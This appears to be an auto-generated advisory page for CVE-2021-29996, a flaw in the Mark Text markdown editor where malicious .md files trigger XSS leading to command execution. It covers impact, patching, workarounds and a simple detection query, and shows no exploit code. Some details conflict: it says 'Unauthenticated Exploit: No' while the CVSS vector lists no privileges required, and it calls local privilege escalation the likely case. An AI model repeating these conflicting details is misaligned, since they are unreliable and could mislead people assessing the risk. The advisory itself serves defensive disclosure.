Login Sign Up

CVE-2021-29996

9.6 CRITICAL
Remote Code Execution Cross-Site Scripting

📋 TL;DR

CVE-2021-29996 is a critical vulnerability in Mark Text that allows attackers to execute arbitrary commands through malicious .md files containing XSS payloads. This affects all users of Mark Text version 0.16.3 and earlier who open untrusted markdown files, potentially leading to complete system compromise.

💻 Affected Systems

Products:
  • Mark Text
Versions: All versions through 0.16.3
Operating Systems: Windows, macOS, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: All default installations are vulnerable when opening .md files. The vulnerability requires user interaction to open a malicious file.

📦 What is this software?

Marktext by Marktext

View all CVEs affecting Marktext →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with attacker gaining complete control over the victim's machine, data theft, ransomware deployment, and lateral movement within networks.

🟠

Likely Case

Local privilege escalation leading to data exfiltration, malware installation, or persistence mechanisms being established on the affected system.

🟢

If Mitigated

Limited impact if system runs with minimal privileges, has application sandboxing, and users only open trusted files.

🌐 Internet-Facing: LOW (Mark Text is primarily a desktop application, not typically internet-facing)
🏢 Internal Only: HIGH (Users opening malicious markdown files from internal sources like email attachments or shared drives can be compromised)

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires user to open a malicious .md file. Proof of concept exists in GitHub issues showing XSS payloads that lead to command execution.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 0.16.4 and later

Vendor Advisory: https://github.com/marktext/marktext/issues/2548

Restart Required: Yes

Instructions:

1. Download latest version from official GitHub releases. 2. Uninstall old version. 3. Install new version. 4. Restart system to ensure clean state.

🔧 Temporary Workarounds

Avoid opening untrusted markdown files

all

Only open .md files from trusted sources. Treat all markdown files as potentially malicious.

Use alternative markdown editors

all

Temporarily switch to other markdown editors like Typora, VS Code, or Obsidian until patched.

🧯 If You Can't Patch

  • Run Mark Text in a sandboxed environment or virtual machine to limit potential damage
  • Implement application whitelisting to prevent execution of unauthorized commands from Mark Text

🔍 How to Verify

Check if Vulnerable:

Check Mark Text version in Help > About. If version is 0.16.3 or earlier, you are vulnerable.

Check Version:

On Linux/macOS: marktext --version. On Windows: Check in Help > About menu.

Verify Fix Applied:

After updating, verify version is 0.16.4 or later in Help > About menu.

📡 Detection & Monitoring

Log Indicators:

  • Unusual process spawns from Mark Text process
  • Suspicious command execution patterns
  • Network connections initiated by Mark Text

Network Indicators:

  • Outbound connections to suspicious domains/IPs from Mark Text process
  • Unexpected data exfiltration patterns

SIEM Query:

process_name:"Mark Text" AND (process_spawn:* OR network_connection:*)

📊 Metadata

CVE ID: CVE-2021-29996
CVSS v3 Score: 9.6 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CWE: CWE-79
Published: April 5, 2021
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-29996, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)